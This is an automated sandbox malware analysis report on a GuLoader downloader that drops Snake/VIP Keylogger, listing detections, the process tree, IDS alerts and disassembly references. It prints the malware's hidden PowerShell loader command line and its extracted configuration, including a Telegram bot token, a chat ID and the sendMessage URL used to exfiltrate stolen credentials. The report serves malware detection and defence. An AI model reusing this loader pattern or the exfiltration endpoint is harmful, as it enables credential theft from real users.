Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fGu8xWoMrg.exe

Overview

General Information

Sample name:fGu8xWoMrg.exe
renamed because original name is a hash value
Original sample name:2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce.exe
Analysis ID:1587907
MD5:487fad16da392c87fb894a6ccbd95870
SHA1:16f4935ce6d245d535f23a1557b6f0e0ad77baa9
SHA256:2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • fGu8xWoMrg.exe (PID: 2504 cmdline: "C:\Users\user\Desktop\fGu8xWoMrg.exe" MD5: 487FAD16DA392C87FB894A6CCBD95870)
    • powershell.exe (PID: 1864 cmdline: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Mangedoblende.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe" MD5: 487FAD16DA392C87FB894A6CCBD95870)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.2521881649.0000000009B31000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fGu8xWoMrg.exe", ParentImage: C:\Users\user\Desktop\fGu8xWoMrg.exe, ParentProcessId: 2504, ParentProcessName: fGu8xWoMrg.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", ProcessId: 1864, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fGu8xWoMrg.exe", ParentImage: C:\Users\user\Desktop\fGu8xWoMrg.exe, ParentProcessId: 2504, ParentProcessName: fGu8xWoMrg.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) ", ProcessId: 1864, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:17:33.182363+010028033053Unknown Traffic192.168.2.549955104.21.96.1443TCP
            2025-01-10T19:17:35.149863+010028033053Unknown Traffic192.168.2.549969104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:17:30.902465+010028032742Potentially Bad Traffic192.168.2.549937132.226.247.7380TCP
            2025-01-10T19:17:32.355634+010028032742Potentially Bad Traffic192.168.2.549937132.226.247.7380TCP
            2025-01-10T19:17:34.605637+010028032742Potentially Bad Traffic192.168.2.549960193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:17:25.955766+010028032702Potentially Bad Traffic192.168.2.549905142.250.185.174443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:17:53.897388+010018100081Potentially Bad Traffic192.168.2.549998149.154.167.220443TCP
            2025-01-10T19:17:56.507059+010018100081Potentially Bad Traffic192.168.2.550000149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:17:47.167816+010018100071Potentially Bad Traffic192.168.2.549997149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}
            Source: Mangedoblende.exe.1292.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeVirustotal: Detection: 75%Perma Link
            Multi AV Scanner detection for submitted file
            Source: fGu8xWoMrg.exeVirustotal: Detection: 75%Perma Link
            Source: fGu8xWoMrg.exeReversingLabs: Detection: 63%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A87C0 CryptUnprotectData,6_2_227A87C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A8EF1 CryptUnprotectData,6_2_227A8EF1
            Source: fGu8xWoMrg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49947 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.5:49905 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.161:443 -> 192.168.2.5:49916 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49997 version: TLS 1.2
            Source: fGu8xWoMrg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2502967073.00000000072FA000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0040290B FindFirstFileW,6_2_0040290B
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405C13
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0040683D FindFirstFileW,FindClose,6_2_0040683D
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 0018F45Dh6_2_0018F2C4
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 0018F45Dh6_2_0018F4AC
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 0018FC19h6_2_0018F974
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BE501h6_2_225BE258
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BEDB1h6_2_225BEB08
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225B0D0Dh6_2_225B0B30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225B1697h6_2_225B0B30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225B2C21h6_2_225B2970
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225B31E8h6_2_225B2DD0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BE0A9h6_2_225BDE00
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BE959h6_2_225BE6B0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BF209h6_2_225BEF60
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BF661h6_2_225BF3B8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_225B0040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BFAB9h6_2_225BF810
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BD3A1h6_2_225BD0F8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BCF49h6_2_225BCCA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BD7F9h6_2_225BD550
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225B31E8h6_2_225B3116
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 225BDC51h6_2_225BD9A8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A7EB5h6_2_227A7B78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A79C9h6_2_227A7720
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A9280h6_2_227A8FB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227ABA76h6_2_227AB7A8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A4D21h6_2_227A4A78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AD146h6_2_227ACE78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A7119h6_2_227A6E70
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AF136h6_2_227AEE68
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A3709h6_2_227A3460
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A1CF9h6_2_227A1A50
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A02E9h6_2_227A0040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227ABF06h6_2_227ABC38
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A62D9h6_2_227A6030
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227ADEF6h6_2_227ADC28
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A48C9h6_2_227A4620
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A6CC1h6_2_227A6A18
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A32B1h6_2_227A3008
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AF5C6h6_2_227AF2F8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A0B99h6_2_227A08F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A5179h6_2_227A4ED0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AC396h6_2_227AC0C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A7571h6_2_227A72C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AE386h6_2_227AE0B8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A2151h6_2_227A1EA8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A0741h6_2_227A0498
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A6733h6_2_227A6488
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then mov esp, ebp6_2_227AB081
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AC826h6_2_227AC558
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A2A01h6_2_227A2758
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A0FF1h6_2_227A0D48
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AE816h6_2_227AE548
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A55D1h6_2_227A5328
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AB5E6h6_2_227AB318
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AD5D6h6_2_227AD308
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A25A9h6_2_227A2300
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A18A1h6_2_227A15F8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227ACCB6h6_2_227AC9E8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AECA6h6_2_227AE9D8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A5E81h6_2_227A5BD8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A2E59h6_2_227A2BB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A1449h6_2_227A11A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227ADA66h6_2_227AD798
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227AFA56h6_2_227AF788
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 227A5A29h6_2_227A5780
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22816347h6_2_22815FD8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281CDD8h6_2_2281CAE0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22816970h6_2_22816678
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281154Eh6_2_22811280
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22819478h6_2_22819180
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22812756h6_2_22812488
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281BF80h6_2_2281BC88
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281EA88h6_2_2281E790
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22815066h6_2_22814D98
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22817C90h6_2_22817998
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22811E47h6_2_22811BA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281A798h6_2_2281A4A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22813076h6_2_22812DA8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281D2A0h6_2_2281CFA8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281FDA8h6_2_2281FAB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22815986h6_2_228156B8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22818FB0h6_2_22818CB8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281BAB8h6_2_2281B7C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22813996h6_2_228136C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281E5C0h6_2_2281E2C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281079Eh6_2_228104D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 228177C8h6_2_228174D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281A2D0h6_2_22819FD8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 228142B6h6_2_22813FE8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281F8E0h6_2_2281F5E8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 228110BEh6_2_22810DF0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22818AE8h6_2_228187F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 228122C6h6_2_22811FF8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281B5F0h6_2_2281B2F8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281E0F8h6_2_2281DE00
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22814BD7h6_2_22814908
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22817300h6_2_22817008
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 228119DEh6_2_22811710
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22819E08h6_2_22819B10
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22812BE6h6_2_22812918
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281C910h6_2_2281C618
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281F418h6_2_2281F120
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 228154F6h6_2_22815228
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22818620h6_2_22818328
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281B128h6_2_2281AE30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22813506h6_2_22813238
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281DC30h6_2_2281D938
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281030Eh6_2_22810040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22816E38h6_2_22816B40
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22815E16h6_2_22815B48
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22819940h6_2_22819648
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281C448h6_2_2281C150
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22813E26h6_2_22813B58
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281EF50h6_2_2281EC58
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22810C2Eh6_2_22810960
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22818158h6_2_22817E60
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281AC60h6_2_2281A968
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 2281D768h6_2_2281D470
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22814746h6_2_22814478
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22841FE8h6_2_22841CF0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22841190h6_2_22840E98
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22841B20h6_2_22841828
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22840338h6_2_22840040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22840CC8h6_2_228409D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22840801h6_2_22840508
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then jmp 22841658h6_2_22841360
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_229C0A10
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_229C09EA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_229C0D26
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 4x nop then push 00000000h6_2_229C50C7

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49997 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
